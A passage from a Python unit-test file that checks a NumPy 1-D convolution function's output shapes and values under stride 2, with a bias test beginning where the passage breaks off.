observed = conv1d(x, w, stride=2)
expected = np.ones((5, 98, 5)) * 25
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Doubling the input to make extra sure it's good
x = x * 2
observed = conv1d(x, w, stride=2)
expected = np.ones((5, 98, 5)) * 50
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Testing a more dynamic x array.
x = np.asarray([[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5]]).reshape(3, -1, 1)
w = np.ones((3, 1, 2))
observed = conv1d(x, w, stride=2)
expected = [[[6, 6], [12, 12]],
[[6, 6], [12, 12]],
[[6, 6], [12, 12]]]
expected = np.asarray(expected)
self.assertEqual(observed.shape, expected.shape)
self.assertTrue(np.allclose(observed, expected))
# Same test as base, but we add a bias vector of ones.
def test_conv1d_bias(self):
# Shape (batch_size, in_width, in_channels)
x = np.ones((5, 200, 5))
# Shape (filter_width, in_channels, out_channels)
w = np.ones((5, 5, 5))
# Shape (out_channels)
b = np.ones(5)
# We expect that with the 25 filters that the convolution will give 25
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.